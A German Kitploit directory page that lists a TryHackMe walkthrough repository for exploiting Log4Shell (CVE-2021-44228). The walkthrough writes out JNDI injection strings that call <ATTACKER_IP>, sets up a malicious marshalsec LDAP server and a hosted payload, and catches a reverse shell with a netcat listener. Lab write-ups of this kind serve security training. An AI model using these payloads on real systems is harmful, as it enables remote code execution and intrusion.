Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Solar-exploiting-log-4j — Dieses Repository präsentiert eine umfassende Schritt-für-Schritt-Anleitung für den Solar Exploiting Log4j-Room auf TryHackMe, mit dem Schwerpunkt auf dem Verständnis und der Ausnutzung der kritischen Log4Shell-Schwachstelle (CVE-2021-44228).Der Prozess des Auslösens des Exploits und des Erhaltens einer Reverse Shell wird auf praktische und leicht verständliche Weise erklärt. | Kitploit
Tools/GitHubGitHub/lathika-3006/solar-exploiting-log-4j
Privilege EscalationAufklärungSchwachstellenanalyseExploitationReverse EngineeringWebanwendungs-ExploitationPenetrationstestsLernen & BildungLabs & Praxis

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

Dieses Repository präsentiert eine umfassende Schritt-für-Schritt-Anleitung für den Solar Exploiting Log4j-Room auf TryHackMe, mit dem Schwerpunkt auf dem Verständnis und der Ausnutzung der kritischen Log4Shell-Schwachstelle (CVE-2021-44228).Der Prozess des Auslösens des Exploits und des Erhaltens einer Reverse Shell wird auf praktische und leicht verständliche Weise erklärt.

GitHublathika-3006/solar-exploiting-log-4j

Solar-exploiting-log-4j

Repository anzeigen
21vor 5 MonatenNoch nicht geprüft
Teilen

🔥 Solar Exploiting Log4j - TryHackMe Walkthrough

📌 Raum: Solar Exploiting Log4j

Plattform: TryHackMe Schwierigkeitsgrad: Mittel Thema: Log4Shell (Log4j-Schwachstelle)


🧠 Ziel

Nutze die Log4j-Schwachstelle (CVE-2021-44228) aus, um Remote Code Execution zu erlangen und Flaggen einzusammeln.


🛠️ Verwendete Tools

  • Nmap
  • Burp Suite
  • cURL
  • Netcat
  • Python HTTP Server

🌐 Schritt 1: Aufklärung

🔍 Ziel scannen

root@kitploit:~
nmap -sC -sV <TARGET_IP>

📌 Ergebnisse

  • Offene Ports: 80 (HTTP), weitere je nach Raum
  • Webanwendung mit Java-basiertem Backend

🌐 Schritt 2: Web-Enumeration

  • Öffne die Web-App im Browser
  • Interagiere mit Eingaben (Login/Suche/Header-Felder)
  • Erfasse die Anfrage mit Burp Suite

💥 Schritt 3: Log4j-Schwachstelle identifizieren

Die Log4j-Schwachstelle ermöglicht JNDI-Injection:

root@kitploit:~
${jndi:ldap://<ATTACKER_IP>:1389/a}

Wenn die Eingabe protokolliert wird → ist die Schwachstelle vorhanden.


⚙️ Schritt 4: Listener einrichten

Netcat starten

root@kitploit:~
nc -lvnp 4444

Bösartigen LDAP-Server starten (Beispiel)

root@kitploit:~
git clone https://github.com/mbechler/marshalsec
cd marshalsec
mvn clean package

LDAP-Server ausführen:

root@kitploit:~
java -cp target/marshalsec.jar marshalsec.jndi.LDAPRefServer "http://<ATTACKER_IP>:8000/#Exploit" 1389

📡 Schritt 5: Payload hosten

root@kitploit:~
python3 -m http.server 8000

Erstelle eine bösartige Java-Klasse (Exploit.class)


🚀 Schritt 6: Exploit auslösen

Injiziere den Payload in das anfällige Feld:

root@kitploit:~
${jndi:ldap://<ATTACKER_IP>:1389/Exploit}

💡 Verwende Header wie:

  • User-Agent
  • X-Api-Version

🖥️ Schritt 7: Reverse Shell erhalten

Sobald ausgelöst:

  • Das Ziel verbindet sich zurück zum Netcat-Listener
  • Du erhältst Shell-Zugriff

🔐 Schritt 8: Privilege Escalation (falls erforderlich)

Prüfen:

root@kitploit:~
sudo -l

Suche nach:

  • Fehlkonfigurierten SUID-Binaries
  • Beschreibbaren Dateien
  • Cron-Jobs

🚩 Schritt 9: Flaggen einsammeln

root@kitploit:~
find / -name flag.txt 2>/dev/null
cat flag.txt

🧾 Gelernte Schlüsselkonzepte

  • Log4Shell (CVE-2021-44228)
  • JNDI-Injection
  • Remote Code Execution (RCE)
  • Reverse Shell
  • Web-Exploitation
Tool herunterladen